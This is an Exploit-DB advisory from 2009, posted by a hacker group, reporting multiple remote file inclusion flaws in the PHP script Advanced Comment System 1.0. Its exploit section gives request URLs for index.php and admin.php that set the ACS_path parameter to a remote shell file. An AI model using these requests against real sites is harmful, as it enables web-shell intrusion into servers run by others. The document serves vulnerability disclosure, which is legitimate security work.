Advanced Comment System 1.0 - Multiple Remote File Inclusions

EDB-ID:

9623




Platform:

PHP

Date:

2009-09-10


======================================================

 Advanced comment system1.0  Remote File Inclusion Vulnerability


<<!>> Found by  :  kurdish hackers team

<<!>> C0ntact : pshela [at] YaHoo .com
                  
<<!>> Groups : Kurd-Team

<<!>> site   : www.kurdteam.org

=======================================================
+++++++++++++++++++ Script information+++++++++++++++++
=======================================================

<<->> script   ::  Advanced_comment_system_1-0

<<->> download script :: http://www.plohni.com/wb/content/php/download/Advanced_comment_system_1-0.zip

=======================================================
+++++++++++++++++++++++ Exploit +++++++++++++++++++++++
=======================================================


<<->> Exploit ::
 
 >>> www.site/path /advanced_comment_system/index.php?ACS_path=[shell.txt?]
                                   /advanced_comment_system/admin.php?ACS_path=[shell.txt?]


=======================================================
 
=======================================================

<<->> All freinds , Zryan_kurd , RootSyS , Bravy_Boy all member kurdish hackers team

# milw0rm.com [2009-09-10]